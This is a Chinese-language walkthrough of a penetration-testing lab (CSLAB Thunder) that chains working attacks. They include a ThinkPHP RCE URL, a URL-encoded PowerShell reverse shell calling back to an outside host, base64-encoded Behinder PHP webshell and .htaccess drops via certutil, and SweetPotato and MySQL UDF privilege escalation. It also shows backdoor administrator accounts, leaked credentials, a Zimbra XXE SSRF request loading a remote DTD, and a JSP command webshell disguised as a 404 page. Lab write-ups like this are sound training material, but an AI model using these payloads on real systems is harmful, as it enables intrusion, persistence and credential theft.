[靶场复现计划]CSLAB Thunder

外网ThinkPHP RCE

命令执行

起手一个ThinkPHP

/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

坏，有360

反弹shell

先用powershell反弹个shell

/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=powershell%20-nop%20-W%20hidden%20-noni%20-ep%20bypass%20-c%20%22%24TCPClient%20%3D%20New-Object%20Net.Sockets.TCPClient('172.16.233.2'%2C%2029998)%3B%24NetworkStream%20%3D%20%24TCPClient.GetStream()%3B%24StreamWriter%20%3D%20New-Object%20IO.StreamWriter(%24NetworkStream)%3Bfunction%20WriteToStream%20(%24String)%20%7B%5Bbyte%5B%5D%5D%24script%3ABuffer%20%3D%200..%24TCPClient.ReceiveBufferSize%20%7C%20%25%20%7B0%7D%3B%24StreamWriter.Write(%24String%20%2B%20'SHELL%3E%20')%3B%24StreamWriter.Flush()%7DWriteToStream%20''%3Bwhile((%24BytesRead%20%3D%20%24NetworkStream.Read(%24Buffer%2C%200%2C%20%24Buffer.Length))%20-gt%200)%20%7B%24Command%20%3D%20(%5Btext.encoding%5D%3A%3AUTF8).GetString(%24Buffer%2C%200%2C%20%24BytesRead%20-%201)%3B%24Output%20%3D%20try%20%7BInvoke-Expression%20%24Command%202%3E%261%20%7C%20Out-String%7D%20catch%20%7B%24_%20%7C%20Out-String%7DWriteToStream%20(%24Output)%7D%24StreamWriter.Close()%22

冰蝎shell

反弹shell太难操作了，哥们还是上个冰蝎吧，嘻嘻。

# 创建upload目录mkdir uploadcd upload# 写入.htaccess，解析4.php（默认不解析php文件）echo'PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+CiAgT3B0aW9ucyArRm9sbG93U3ltbGlua3MgLU11bHRpdmlld3MKICBSZXdyaXRlRW5naW5lIE9uCgogIFJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1kCiAgUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKICBSZXdyaXRlUnVsZSBeKC4qKSQgNC5waHAvJDEgW1FTQSxQVCxMXQo8L0lmTW9kdWxlPg=='>5.jpgcertutil.exe -decode 5.jpg .htaccess# 写入冰蝎webshellecho'PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7CgkkX1NFU1NJT05bJ2snXT0ka2V5OwoJc2Vzc2lvbl93cml0ZV9jbG9zZSgpOwoJJHBvc3Q9ZmlsZV9nZXRfY29udGVudHMoInBocDovL2lucHV0Iik7CglpZighZXh0ZW5zaW9uX2xvYWRlZCgnb3BlbnNzbCcpKQoJewoJCSR0PSJiYXNlNjRfIi4iZGVjb2RlIjsKCQkkcG9zdD0kdCgkcG9zdC4iIik7CgkJCgkJZm9yKCRpPTA7JGk8c3RybGVuKCRwb3N0KTskaSsrKSB7CiAgICAJCQkgJHBvc3RbJGldID0gJHBvc3RbJGldXiRrZXlbJGkrMSYxNV07IAogICAgCQkJfQoJfQoJZWxzZQoJewoJCSRwb3N0PW9wZW5zc2xfZGVjcnlwdCgkcG9zdCwgIkFFUzEyOCIsICRrZXkpOwoJfQogICAgJGFycj1leHBsb2RlKCd8JywkcG9zdCk7CiAgICAkZnVuYz0kYXJyWzBdOwogICAgJHBhcmFtcz0kYXJyWzFdOwoJY2xhc3MgQ3twdWJsaWMgZnVuY3Rpb24gX19pbnZva2UoJHApIHtldmFsKCRwLiIiKTt9fQogICAgQGNhbGxfdXNlcl9mdW5jKG5ldyBDKCksJHBhcmFtcyk7Cj8+Cg=='>2.jpgcertutil.exe -decode 2.jpg 4.php

拿下新年第一个FLAG：

上线CS并提权

LOCAL SERVICE权限，直接SweetPotato提权

用https://github.com/SecurityAnalysts01/ShellcodeLoader免杀

SweetPotato提权（新年第一提）

顺手抓个密码，Administrator/Tp@cslKM

我直接远程加一手后门用户：

shell net user benbi pass@123 /addshell net localgroup administrators benbi /add

不是哥们，还不让我连

CS开启一手RDP服务

RDP连接上第一件事：忘本（卸360，嘻嘻）

内网信息搜集

根据题目提示，把cslab加到字典里，扫描出下面这个东东：

• 172.20.57.98 3306 root cslab

MySQL UDF提权

secure_file_priv为空，直接一手UDF提权

坏，有Windows Defender，能落地但运行就寄

嘻嘻，幸好可以分离免杀

流量转发转发再转发~转发到自己的CS~

SweetPotato继续提（新年第二提）

嘿嘿，我又加后门用户啦

蛇年第二个FLAG

又是双网卡嘞

ZBlog篡改密码RCE

哟，有个ZBlog

ZBlog1.7.3

拉一手源码，审

嘿，guid我有，ps可控，这不轻松拿捏

ps = 123456guid = 24d876c8772572cf839674c5a176e41cPassword = md5(md5(123456) + 24d876c8772572cf839674c5a176e41c)Password = 30492f76a0fbcf3906cce8b4b566d6b6

进后台

传个害群之马：

• https://github.com/fengyijiu520/Z-Blog-

sudo小提一手权，这个/home/www/write.sh很微妙，直接root

不是哥们，怎么还有一层

Zimbra XXE SSRF

dtd如下：

<!ENTITY % fileSYSTEM"file:../conf/localconfig.xml"><!ENTITY % start"<![CDATA["><!ENTITY % end"]]>"><!ENTITY % all"<!ENTITY fileContents '%start;%file;%end;'>">

直接读密码，嘿嘿

POST /Autodiscover/Autodiscover.xml HTTP/1.1Host: 10.1.1.56:8443Cookie: ZM_TEST=trueCache-Control: max-age=0Sec-Ch-Ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Priority: u=0, iConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 398<!DOCTYPE Autodiscover [        <!ENTITY % dtd SYSTEM "http://10.1.1.78/1.dtd">        %dtd;        %all;        ]><Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">    <Request>        <EMailAddress>aaaaa</EMailAddress>        <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>    </Request></Autodiscover>

账密在手，天下我有

python3 Zimbra_SOAP_API_Manage.py https://10.1.1.56:8443 zimbra rhqkAlU5n_ ssrfuploadwebshellshell.jsp

shell.jsp：

<!-- gh/aels --><H1><CENTER>404 Not Found</CENTER></H1><%@ page import="java.io.*" %><%    String cmd = request.getParameter("cmd");    String output = "";    String error = "";if(cmd != null) {        String[] commandAndArgs = new String[]{ "/bin/bash", "-c", cmd };        String s = null;        Process process = Runtime.getRuntime().exec(commandAndArgs);        InputStream inputStream = process.getInputStream();        BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));        Thread.sleep(2000);while(process.isAlive()) Thread.sleep(100);while((s = reader.readLine()) != null) { output += s+"n"; }        reader = new BufferedReader(new InputStreamReader(process.getErrorStream()));while((s = reader.readLine()) != null) { error += s+"n"; }    }%><FORM><INPUT name=cmd style=border:0;display:block; type=text value='<%=cmd %>'></FORM><pre>    <%=output %>    <%=error %></pre>

下班下班，出门放炮了。